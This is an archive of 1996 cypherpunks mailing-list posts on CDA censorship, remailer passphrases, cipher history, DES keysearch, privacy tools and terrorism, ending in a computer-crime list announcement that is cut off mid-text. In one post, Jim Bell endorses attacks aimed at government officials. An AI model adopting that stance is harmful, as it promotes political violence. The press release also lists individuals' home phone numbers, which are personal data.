>The "Black Thursday Machine" invites Internet surfers who visit the site
>to type in the address of their favourite Web page, to see what it might
>look like if a Canadian version of the new and controversial American
>"Communications Decency Act" were put into effect.
>
>The "Black Thursday Machine" will fetch any page you request, but it
>presents you with a censored version.  The algorithm it uses is simple
>and unsophisticated -- but these are the same kinds of rules recently
>used by America Online and CompuServe when they blocked access to
>discussions including the words "gay", "sex", or "breasts".
>
>"Any naughty word is replaced by the word 'CENSORED' in bright red,"
>says Rob Stanley, who was the chief programmer.  Which words are on
>the forbidden list?  "It works just like government censorship,"
>says Stanley, "you don't get to choose.  It's an arbitrary process."
>
>The Web site has links to a few representative examples, including pages
>about "Breast Feeding", "Safe Sex", "Planned Parenthood", and help for
>troubled "Gay Youth", that are rendered almost unintelligible by the
>crude censorship.
>
>"Despite well-intentioned desires to protect children,"
>says Jeffrey Shallit, vice-president of Electronic Frontier Canada,
>"adults need to be able to communicate freely about controversial issues.
>Otherwise, we'll reduce the level of discussion on the Net to
>Winnie-the-Pooh."  Paraphrasing a U.S. Supreme Court Justice,
>Shallit said that censoring the net to protect children is
>like "burning down your house in order to roast a pig".
>
>"The 'Black Thursday Machine' demonstrates the ravages of censorship
>in an amusing and provocative manner", says David Jones, president of EFC.
>"I hope people will take a moment during 'Freedom to Read Week' to visit
>the web site because it illustrates what the wired world might look like
>if artistic expression, vigourous debate, and all the subtley of human
>communication and interaction were subjected to the cold, calculating,
>and heartless scrutiny of a machine that filters out what the government
>might deem as controversial, offensive, or just plain inappropriate for
>the eyes of its citizens."
>
>
> * Why "Black Thursday" ?
>
>New and harsh restrictions on what can be communicated through American
>computer networks were signed into law on Thursday, February 8th, 1996
>-- "Black Thursday".  "This sent a shock wave through the Internet,
>where concerned individuals around the world "Painted the Web Black"
>for 48 hours as a sign of protest," says David Jones, EFC president.
>
>
> * About "Freedom to Read Week" in Canada (February 26 to March 3)
>
>"The purpose of 'Freedom to Read Week'," says Sandra Bernstein,
>"is to encourage Canadians to think about and reaffirm their commitment
>to intellectual freedom, as guaranteed under the Charter of Rights and
>Freedoms."  Sandra Bernstein, also a member of Electronic Frontier Canada,
>represents the Periodical Writers Association of Canada on the
>Book and Periodical Council's Freedom of Expression Committee,
>which sponsors 'Freedom to Read Week' each year.
>
>Bernstein also maintains an online "Chronicle" which documents challenges
>to Freedom of Expression in Canada:
>
>        http://www.efc.ca/pages/chronicle
>
>-30-
>
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>EFC Contact Information:
>
>
>Electronic Frontier Canada
>
> Dr. David Jones        phone: (905) 525-9140 x24689    fax: (905) 546-9995
>        email: djones@efc.ca
>
> Dr. Jeff Shallit       phone: (519) 888-4804           fax: (519) 885-1208
>        email: shallit@efc.ca
>
> Dr. Richard Rosenberg  phone: (604) 822-4142           fax: (604) 822-5485
>        email: rosen@efc.ca
>
>
>Electronic Frontier Canada, online archives:
>
> URL:   http://www.efc.ca/
>
>
>- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>Other Contact Information:
>
>- - - - -
>
>Multimedia designers who dreamed up the "Black Thursday Machine":
>
>  -- programming, engine development.
>Rob Stanley,            phone: (416) 928-9503 (home), (416) 960-8400 (work)
>        email:  themaxx@io.org
>
>  -- graphical look, interface, design, and copy
>Andrew Chak,            phone: (416) 469-4154 (home), (416) 448-2403 (work)
>        email:  chak@magic.ca                   fax: (416) 469-0914
>
>  -- concept development, design
>Brian Hall,             phone: (416) 504-0908 (home), (416) 351-1040 (work)
>        email:   brian@hyperactive.net,         pager: (416) 337-3377
>
>These fellows also dreamed up the award-winning "Canadianizer"
>at the following URL:   http://www.io.org/~themaxx/canada/can.html
>
>- - - - -
>
>Additional sponsors of the "Black Thursday Machine:
>
>
>HyperActive NetMedia    http://www.hyperactive.net
>Vex.Net                 http://www.vex.net
>Passport Online         http://www.passport.ca
>
>- - - - -
>
>Further Contact Information for 'Freedom to Read Week' in general
>
>
>Freedom to Read Week -- Web page URL:   http://www.cycor.ca/pwac/freeweek.htm
>
>Freedom to Read Week  -- Publicist, Sarah Thring
>phone:  (416) 480-2533,  fax:  (416) 480-2434.
>
>Sandra Bernstein,       phone:  (416) 465-0798
>email: sandrab@inforamp.net,  URL: http://www.inforamp.net/~sandrab/home.htm
>
>Book and Periodical Council, 35 Spadina Road Toronto, ON Canada M5R 2S9
>email:  bkper@interlog.com
>phone:  (416) 975 9366,  fax:  (416) 975 1839
>
>Periodical Writers Assoc. of Canada, 54 Wolseley St, 2nd Floor, Toronto M5T 1A5
>email:  pwac@cycor.ca    URL:  http://www.cycor.ca/PWAC/Words.htm
>phone:  (416) 504-1645,  fax:  (416) 703-0059








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 10 Mar 1996 14:26:57 +0800
To: Marianne Mueller <mrm@netcom.com>
Subject: Re: Leslie Fish address?
In-Reply-To: <199603040608.WAA13704@netcom20.netcom.com>
Message-ID: <Pine.SOL.3.91.960304143625.10234G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Mar 1996, Marianne Mueller wrote:

> That's a wonderful notion - I think a Zappa tune would fit - 
> 
> (Pretty Good Music, the CD...) 

..
 "RSA can you see, By the DN's early light"
..
 "People try to put us down
  Modular Exponentiation"
..

"Well we squared the accum
 And halved the exponent
 And people could see I was a proponent
 of Big Nums
   Big Bad Nums"
...



---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Mar 1996 13:05:39 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics 9!
Message-ID: <m0ttiy9-000909C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 3/3/96 -0500, John Young wrote:
>On Mar 03, 1996 10:57:14, 'nobody@REPLAY.COM (Anonymous)' wrote: 
> 
> 
>>Just because you two aren't interested, doesn't mean others aren't. 
>>Work is actually in progress in implementing such a system. 
> 
> 
>The Economist of March 2 has a cover story on state, church and private
>terrorism, the effectiveness and failures of each, the arguments and
>apologies, the savages and the victims, the lucrative concocting of
>imaginary enemies -- military, religious, political, personal. 
>  
>It's conclusions are ... well, have a read and dread how the Demon Trio of
>state, church and private super-righteous sub-humans will murder you and
>your loved ones next to fulfill their blind ambitions. 

Well, I'm not particularly interested in how the Establishment is going to 
demonize those who would seek its eventual downfall.  While I probably 
wouldn't have any argument against complaints about "state and church
terrorism," I really 
doubt whether the so-called "private terrorism" you mention above qualifies.

Most traditional "terrorism" (as least "traditional," by the standards of 
the last 20 years) is thought to involve relatively unfocussed attacks 
against people and locations, but in situations where attacks against 
selected government officials would be far more selective and effective.  
Naturally, those same officials wouldn't approve of replacing a scattershot 
technique with one that targets them more directly. 

Since I propose exactly that kind of replacement, I am presumably not the 
most ingratiating figure to these people.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Fri, 8 Mar 1996 13:05:37 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: (Fwd) Gov't run anon servers
In-Reply-To: <m0tthV7-000915C@pacifier.com>
Message-ID: <199603042306.SAA15164@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
# The passphrase is in PLAINTEXT in the script file
# which runs the remailer!.  It has to be.  That is true of all automated
# remailers. 

Jim Bell writes:
> Maybe I just don't know much about automated remailers, but I don't 
> understand why you said that the passphrase "has to be" in plaintext in the 
> script file.  I find this hard to believe.  While I am far from an expert on 
> cryptographic matters, I would assume that any received attempt at a 
> password could be securely hashed (128 bits?) and compared with a pre-stored 
> hash value.   If it's the same, it's assumed that the password was correct.
> 
> What's wrong with this?

For the less sophisticated remailer software that uses variable-size
messages and (optionally) PGP, the remailer script needs to feed the
plaintext passphrase into PGP to decrypt the remailer's private PGP key.

Mixmaster, which includes its own set of crypto routines (currently using
RSA with 3DES as I recall), allows you to compile the private key passphrase
into the executable, and wipe out the source code. This obscures the
passphrase plaintext from (very) casual observers.  

The fundamental problem AFAICS is the difficulty of getting a program to keep
a secret from an observer. If the program doesn't actually _use_ the secret
(in the way that the secret is useful, e.g. as the basis for a symmetric
key), then it seems you can attain an arbitrary level of "security through
obscurity", because you can encode the secret however you want in the code.

But if a program is capable of possessing and using the secret without
human intervention, then anyone with a copy of the program can do the same.  

Bottom line: if you can crack (say) the 8-character Unix passphrase for a
remailer account, you have full access to the remailer's secrets and all the
opportunities that presents. Good remailer account passphrases are
important.

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 8 Mar 1996 01:36:59 +0800
To: cypherpunks@toad.com
Subject: Re: NYT on Crypto Bills
In-Reply-To: <199603041509.KAA02654@homeport.org>
Message-ID: <LuJakD41w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> 	Markoff shouyld know better than this.  There is a long
> history of business use of codes & ciphers, going back hundereds of
> years, and durring the heyday of the telegraph, there were fair size
> companies that created codebooks with (locally configurable)
> superencipherment systems for the market.
>
> Adam
>
> John Young wrote:
>
> |    Compromise Bills Due on Data Encryption
> |       Industry Opponents and Civil Libertarians Are Lukewarm,
> |       at Best
> |    By John Markoff
>
> |    Data-coding, or encryption, technology is based on
> |    mathematical formulas that rely on the immense computing
> |    challenge inherent in factoring large numbers. Until
> |    recently, such technology was largely used by military and
> |    intelligence organizations and by some corporations like
> |    banks. As electronic mail and commerce have become
> |    increasingly accessible, however, the technology has become
> |    more controversial.
>

Yes - the Markoff quote is factually incorrect.  I'm sure he knows better
than this.  Must be the Times editing.

What he probably meant (and perhaps wrote) was that the cyphers used in
business for centuries could be broken by governments. This started
changing only after WW I. Wasn't the Enigma marketed to businesses?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Mar 1996 01:36:29 +0800
To: mike@fionn.lbl.gov
Subject: Re: NYT on Crypto Bills
In-Reply-To: <199603041810.KAA07446@fionn.lbl.gov>
Message-ID: <199603050100.UAA04996@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Helm writes:
> On Mar 4,  3:09pm, Adam Shostack wrote:
> > 	Markoff shouyld know better than this.  There is a long
> > history of business use of codes & ciphers, going back hundereds of
> > years, and durring the heyday of the telegraph, there were fair size
> > companies that created codebooks with (locally configurable)
> > superencipherment systems for the market.
> 
> I thought that, for the most part, the telegraph systems described
> above were to reduce cable charges (1 code word instead of a 15-word
> sentence, a huge savings in those days).

Totally untrue. The use of encryption for business purposes goes back
centuries, and there were commercial providers of blank telegraph code
books all through the 19th century. The use of crptography to protect
communications only declined with the end of telegrams and the
reduction in the perception that large numbers of strangers would be
handling your missives. See "The Codebreakers" for a history of this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 9 Mar 1996 13:09:27 +0800
To: cypherpunks@toad.com
Subject: Re: Bombings, Surveillance, and Free Societies
Message-ID: <199603050416.UAA27860@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I believe this is where I came in...

At 12:51 PM 3/4/96 -0800, tcmay wrote:
>
>Revolutionary theory says of course that this increased clampdown is a
>desired effect of terrorist bombings and attacks. Fear and doubt.
>Revolutionary ends rarely happen by slow, incremental movement. Hundreds of
>examples, from the original "bomb-throwing anarchists" to the modern mix of
>terrorist bands. The Red Brigade in Italy sought a fascist crackdown, and
>the "strategy of tension" is common. (And even revolutionists of crypto
>anarchist persuasion often think laws like the CDA are good in the long
>run, by undermining respect for authority and triggering more extreme
>reactions....)

Well, I think they're wrong. Revolutionary theorists are right about the
*beginning* of the dialectic. Action breeds reaction breeds counterreaction,
and so on. Repression opens up all sorts of new opportunities. Ezekiel, St.
John, Marx, Hitler, Winnie (not Nelson) Mandela, and so on were right about
that.

However, the dialectic eventually stabilizes; not every revolution is
Armageddon. People get tired of revolution and counterrevolution, and yearn
for stability, under *any* regime. That's why otherwise reasonable people
let the Bolsheviks, Nazis, Napoleons, Democrats, and Republicans take power.

Revolution is like a box of chocolates... you never know what you're going
to get.

I don't like extremists. But then, I'm a fucking statist.

In South Africa, most of Latin America, and (until a few weeks ago) Palestine
and Northern Ireland, tolerance has taken a few halting steps. You drop your
gun, I'll drop mine. You open up the political process to let me
participate, and I'll open up my processes so that you can trust me too. You
purge the right-wing death squads on your side, I'll purge the left-wing
terrorists on my side.

I'm a firm believer in privacy for individuals, but for groups, of any kind,
popular or unpopular, public or private, I'm not so sure.

-rich
 http://www-leland.stanford.edu/~llurch/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Fri, 8 Mar 1996 01:38:09 +0800
To: cypherpunks@toad.com
Subject: Re: Bombings, Surveillance, and Free Societies
Message-ID: <199603050128.UAA29140@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:

>The Red Brigade in Italy sought a fascist crackdown, and
> the "strategy of tension" is common. (And even revolutionists of crypto
> anarchist persuasion often think laws like the CDA are good in the long
> run, by undermining respect for authority and triggering more extreme
> reactions....)

It is important to note in this regard that the worst bombing in Italy was
the Bologna station bombing, now decisively linked to right wing facist
groups the involvment in which of ex-prime minister Adreotti is shortly to
be examined in a criminal trial. The point being that the extreemists play
into each others hands.


> -- expect increased support for a "New World Order" to restrict
> non-governmental access to strong crypto (via key escrow measures)

This is pretty much a diversion. Terrorist groups have been using encryption
since long before PGP arrived.

> -- expect the various laws about "talking about explosives on the Net" to
> be used to clamp down on various fringe groups

Hang on here, some of those groups are actively conspiring to commit
terrorist acts. If someone sends a message saying "lets plant a bomb
under a federal building, that will show them" I'm not worried if the
govt. decides to arrest a few people. There is a border between free
speech and conspiracy to murder which some people have crossed.

> -- expect "national security" to become a bigger part of the political debate

Possibly.

> -- expect more and bigger bombings, as the groups thinking about bombings
> see how productive they are in accomplishing policy goals (such as ending
> peace talks, triggering police state actions, etc.)

The IRA has not got very far after 25 years or terrorism. The civil rights 
movement which the IRA usurped achieved much more in the five years before
the IRA started killing people. Had it not been for the IRA there would 
probably have been a settlement by now. The same goes for Israel where 
the PLO only gained a partial settlement after giving up the terrorism.

> I predict that it will take about 5 more major bombings in European and
> American cities to trigger substantive changes in laws.

Generally it takes two. The legislation is written after the first and
then staled until being passed on the second.

There is a usefull procedure in the UK parliament which causes bills to
expire at the end of each session.

Note that on the CDA there was the behaviour of certain people deliberately
seeking to create an issue. The CDA was to a large extent the work of one
Marty Rimm and his fellow conspirators.

> Personally, while I feel sorry for the dead in Israel, I think anyone who
> moves to a small desert state surrounded on all sides by Arabs who want
> their land back is asking for trouble.

A point to consider is that there are many Isralis born in Israel who have no 
other home. These people did not ask to be born in the middle of a desert
state. As with the Irish problem it is easy to solve if one could change
the past. The fundamental problem being that the wrong side won at Hastings.

	Phill
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTuYpioZzwIn1bdtAQEkMQF+I1lUyGbzdScAyYqtSDLPGuX4qsCTKcmM
Plfdv25rn9u8M6squAw5xfgaQu8au1Ce
=9xbY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Fri, 8 Mar 1996 01:36:51 +0800
To: cypherpunks@toad.com
Subject: Re: NYT login
Message-ID: <199603050134.UAA29186@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just Rich wrote:
> 
> On Sun, 3 Mar 1996 hallam@w3.org wrote:
> 
> > >The tobacco companies need a forum. And they are used to spending big
> > >bucks on sponsoring things.
> >
> > That misses the point. There is no shortage of potential sponsors.
> > What these people are asking me is "how much business will Web
> > advertising create for me".
> 
> This misses another point. The question was, how do *we* pay for this
> stuff (emphasis mine).
> 
> If someone develops a reasonably easy-to-use and reasonably secure digital
> cash micropayment system, then I would be happy to pay to read the New
> York Times on the Web. I would rather they were dependent on my money than
> R.J. Reynold's.

I am attempting to support the largest number of models possible. Micropayments
is only one model, I have an internet draft out describing a scheme based on
a suggestion by Ron.

I don't think I should choose how people will raise revenue. I don't think
that the NYT will want to be associated with cancer sticks in any case. There
are plenty of sponsors such as IBM, Intel etc who will be happy to pay cash
for a Web  site ad, provided it makes them money.

	Phill
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMTuaOCoZzwIn1bdtAQF5DQGAsdUiYsmP0EwHZUWA2ijeAZf/pBoqFtzR
VDYY2760gf0QLqNBDbLHo6LnJp7T4b5h
=vjES
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 9 Mar 1996 13:10:04 +0800
To: cypherpunks@toad.com
Subject: Re: numbers don't lie
Message-ID: <01I1YG03B2W29ELJNN@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 03/04/96 07:59 pm ##
  Subject: Re: Numbers don't lie... ]

>Date: Sun, 18 Feb 1996 11:18:57 -0500 (EST)
>From: "A. Padgett Peterson P.E. Information Security"
>Subject: Numbers don't lie...

>In their figures, they do seem to gloss over a couple of minor points:

>The most compelling to me is "how do you know when you broke it ?".
>Bruce has always used the "known plaintext" approach, however using
>modern techniques for messaging, *every* message has a different
>session key, negotiated using assymetric keying so the only message
>that will be broken is one that you already have - not terribly
>helpful.

Coming up with a short length of known plaintext isn't usually a big
problem.  For example, attacking DES, you need to know one 64-bit
block.  In many cases, this is easy to do.  While it is possible
(and a good idea) to build communications software so that it's
relatively hard to get known plaintext, this shouldn't be necessary
to use a cipher securely.  And in any case, if you're encrypting
ASCII text, the bit distributions give you a big clue about whether
this is a reasonable key guess or not, after just a few decrypted
plaintexts.  This increases the cost of the search machines, but I'm
not convinced that this will be an enormous increase in all cases.

>This means that the strength of cryptography should be appropriate
>to the value of the information protected. If less than U$10,000,
>the message is individually encrypted, and has value only today,
>then DES is probably "good enough".

True, DES is probably good enough for the very lowest-value
messages.  But why use something that's barely acceptable, when it
costs you almost nothing at all to make it really secure against
keysearch attacks.  Blowfish, SAFER-SK128, GOST, and 3DES are all
apparently quite hard to break, and they are all far more resistant
to keysearch attacks than DES.

>Strategic information of higher value arguably needs "more" but how
>much ? 64 bits is 256 times stronger than DES. This would indicate
>effective security up to say U$2.5 million. More is better but I
>would not be quite so alarmist nor would I dismiss the cost of
>engineering. Non-trivial.

The problem here is that it's not really reasonable to expect the
users of a secure e-mail package to know what the state of the art
is in terms of keysearch machines, and it's not always reasonable to
expect the person that's sending some piece of information to know
whether this is "you-bet-your-company" material.  There's no excuse
for leaving yourself vulnerable to keysearch attacks, when there are
so many good, unpatented ciphers with key lengths of more than 100
bits.  It's like building a car with an engine that you know will
catch fire if it's ever run at more than 80 MPH, but justifying it
by saying "well, most trips don't require more than 80 MPH to get
where they're going anyway.  In those special cases where greater
speed is necessary, they'll just have to take a bullet train."

>Still, at what point is it simply easier/cheaper to buy someone who
>knows the secret ?

Limiting your key to 56 bits means that an attacker has more
options--if he can't bribe, blackmail, or threaten his way into your
private communications, he can spend some money, and still get in.
(Escrowing your key adds to the list, because he now has more people
to bribe/threaten/blackmail, and he may also be able to carry out
protocol attacks against the key escrow mechanism.)

>						Warmly,
>							Padgett

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTujGkHx57Ag8goBAQElEwP/ZpzwCpwGUhbHJvEl+EiuseNEgy9To5yl
RyX3VkdX+Xx6jksZeuLlSuRoMlahxyMHdH7uDY/8GFW2uxh8dFAJfwNdBCf3k0W8
aYml2Z/CCVadeuiSrKgZEMvE3F/LlDSCXQwuIde1Su7ICxQz9pd8ZbAqvOdQQWyZ
ZQPr9TPCo/s=
=zM5N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sat, 9 Mar 1996 13:06:17 +0800
To: cypherpunks@toad.com
Subject: POTP Jr.
Message-ID: <01I1YG0HUUZS9ELJNN@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Date: 03/04/96 07:59 pm ##
  Subject: POTP Jr. ]

>Date: Sun, 18 Feb 1996 19:20:55 -0800 (PST)
>From: Wink Junior <winkjr@teleport.com>
>Subject: Internet Privacy Guaranteed ad (POTP Jr.)

>         If an individual, or any group of individuals, break the IPG
>         Privacy System, IPG will sell them the company for $1.00, and
>         even give them the dollar to buy it with. If you think you
>         can, just try and you find out that it is impossible. There
>         may be rumors that someone has broken the system, but that is
>         not possible, it will never happen.

Surely I can't be the only person who's noticed the obvious--that if
you break their system, their company is worth nothing, since this
is their only shipping product.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTujK0Hx57Ag8goBAQHxBQQAkUKL0h0eqxJ5rNGg7dDF6Beskem/RUWA
IZYNoHBG/WZYv86dDrFSVXOllqyumlo5enH0xwXBfDf0TN+kasjIaH/UYHncXYiL
yw/31wBDt4H1PzmF7Yg5zfSBaN18l9dFT+rLGRJKRjWFgzGIAJZ6Jmga7RJ0P+/k
TWCgt4AdIIc=
=eI1Q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 9 Mar 1996 13:09:45 +0800
To: cypherpunks@toad.com
Subject: PET - The Path to Anonymity
Message-ID: <199603050332.WAA17483@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Tracing the lead from the Canberra/OECD paper to the 
   excellent Ontario Privacy Commission site: 
 
      http://www.ipc.on.ca/web_site.eng/matters/sum_pap/ 
      summary.html 
 
   This summary of privacy papers includes: 
 
   Privacy-Enhancing Technologies:  The Path to Anonymity 
   (Volume 1):  A Joint Project of the Office of the 
   Information and Privacy Commissioner/Ontario and the 
   Registratierkamer, The Netherlands discusses concerns 
   associated with the trail of identifying information 
   created by electronic transactions, and a number of 
   techniques for introducing an identity protector into 
   information systems. The paper provides background 
   information, the details of the joint survey, and the 
   conclusions and recommendations. (August 1995, 107 KB, 26 
   pages). Available through: 
 
      ftp://ftp.ipc.on.ca/ftp/ftp_site.eng/matters/sum_pap/ 
      papers  
 
   ---------- 
 
   In the Netherlands, two volumes are listed (along with 
   other choice crypto books) at the most informative site:  
  
      http://infolabwww.kub.nl:2080/infolab/netwerken/ 
      scripties95/groep8/literatuurlijst.html  
  
   Registratiekamer. Privacy-enhancing technologies: the path 
   to annonimity, volume I, augustus 1995. 
   ISBN 90 346 320 24. 
 
   Registratiekamer. Privacy-enhancing technologies: the path 
   to annonimity, volume II, augustus 1995. 
   ISBN 90 346 320 24. 
 
   _________________________________________________________ 
  
   Links are provided to such privacy tools as the admirable 
   "Identity Protector" at: 
 
      http://infolabwww.kub.nl:2080/infolab/netwerken/ 
      scripties95/groep8/ip.html 
 
                      DE IDENTITY PROTECTOR  
 
   [Snip] 
 
 
   De identity protector heeft de volgende functies: 
 
      * rapporteert en controleert verzoeken wanneer de 
      werkelijke identiteit bekend wordt; 
 
      * genereert pseudo-identiteiten; 
 
      * vertaalt pseudo-identiteiten naar werkelijke 
      identiteiten; 
 
      * converteert pseudo-identiteiten naar andere 
      pseudo-identiteiten; 
 
      * voorkomt verkeerd gebruik. 
 
   De gebruiker kan, met behulp van de identity protector, 
   zelf bepalen bij welke aanbieders van diensten zijn 
   werkelijke identiteit mag worden onthuld.  
 
   Het gebruik van een identity protector verdeeld het 
   informatiesysteem in twee domeinen. Eèn waarin de 
   werkelijke identiteit van de gebruiker bekend of 
   toegankelijk is, en èèn waarin deze door de identity 
   protector is afgeschermd. Het domein waarin de werkelijke 
   identiteit bekend is noemen we het identiteits-domein, het 
   domein waarin deze is vervangen door een pseudo-identiteit 
   noemen we het pseudo-domein. ... 
 
   _________________________________________________________ 
 
 
   The Australians, Canadians and Dutch seem far ahead of the 
   US in promoting technologies for protecting privacy. It 
   makes one wonder if it is the intrusive practices and 
   technologies of the super-surveillance US that they fear 
   even as most Americans ostrich the sand. 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 9 Mar 1996 13:11:10 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: NYT on Crypto Bills
In-Reply-To: <LuJakD41w165w@bwalk.dm.com>
Message-ID: <199603050354.WAA06580@homeport.org>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:

| Yes - the Markoff quote is factually incorrect.  I'm sure he knows better
| than this.  Must be the Times editing.

This mistake has popped up multiple times in his work.  I'm not sure
he's aware of it.

| What he probably meant (and perhaps wrote) was that the cyphers used in
| business for centuries could be broken by governments. This started
| changing only after WW I. Wasn't the Enigma marketed to businesses?

	Yes, the initail (failed) marketing was to business.  Only
when the Nazi's started buying did sales start to take off.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sat, 9 Mar 1996 13:13:27 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Remailer Security
Message-ID: <ad6127500102100411d6@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 03/04/96, lmccarth@cs.umass.edu wrote:
>Bottom line: if you can crack (say) the 8-character Unix passphrase for a
>remailer account, you have full access to the remailer's secrets and all the
>opportunities that presents. Good remailer account passphrases are
>important.

Um, there's no reason why your remailer's account needs to be logged into
interactively, is there?  Seems like remailer ops should disable login to
remailer accounts, putting '*' into the password field in /etc/passwd, or
however unix lets you disable login (I know it does).

Obviously, the general security risk of someone gaining unauthorized access
to the remailer executable or data files is still there, and important to
keep in mind.  But this would seem to be a fairly logical security measure.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 7 Mar 1996 02:03:28 +0800
To: cypherpunks@toad.com
Subject: Legal Aspects of Computer Crime (LACC)
Message-ID: <199603041324.XAA25903@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain



            _                                _____         _____
           | |               /\             / ____|       / ____|
           | |              /  \           | |           | |
           | |             / /\ \          | |           | |
           | |____        / ____ \         | |____       | |____
           |______|      /_/    \_\         \_____|       \_____|
         
           Legal         Aspects     of    Computer      Crime
                  
            "echo subscribe lacc|mail lacc-request@suburbia.net"


WHEN YOU HAVE SUBSCRIBED
------------------------

    Send in a brief synopsis of who you are and why you are interested
    in Computer Crime as your first message to the list (this helps
    to stimulate discussion and debate as well as provide a sense
    of the LACC community). As a [small] example:

      "Hello, My name is Jane Reynor. I am an articled clerk at the
       Director of Public Prosecutions. I have been assigned as an
       assistant legal researcher to the prosecution of a bank officer
       involved in fraudulent EDI transactions. My interest in computer
       crime stems not just from the case we are working on, but also
       from an otherwise unrelated passion for computer networking that
       I suffered under during my period as undergraduate."

REASONS FOR INCEPTION
---------------------

    The growing infusion of computers and computing devices into society
    created a legislative and common law vacuum in the 1980's. State
    prosecutors attempted to apply traditional property protection and
    deception laws to new technological crimes. By and large they were
    successful in this endeavor. There were however a very few but well
    publicized failed cases against computer "hackers" (notably R vs
    Gold - UK House of Lords and the E911 case). To the informed, these
    cases demonstrated not so much a legislation vacuum, but prosecution
    incompetence in choosing which statute to lay charges under and
    mis-management by prosecuting cases where the real offence of the
    defendant was merely the embarrassment of the powerful.

    In an atmosphere of increased government reliance on computer
    databases and public fear and hostility towards computerization of
    the workplace, legislatures rushed to criminalise certain types of
    computer use.  Instead of expanding the scope of existing
    legislation to more fully encompass the use of computers by
    criminals, changing phrases such as "utter or write" to "utter,
    write or transmit" (the former being the prosecutions undoing in the
    well publicized Gold case) as had been done with the computerization
    of copyright law, an entirely new class of criminal conduct was was
    introduced. The computer had been seen not just as another tool that
    criminals might use in committing a crime but something altogether
    foreign and removed from the rest of society and established Law.
    The result was a series of naively drafted, overly broad and
    under-defined statutes which criminalised nearly all aspects of
    computer use under certain conditions.

    In the early 1990's a fundamental and evolving shift in computer
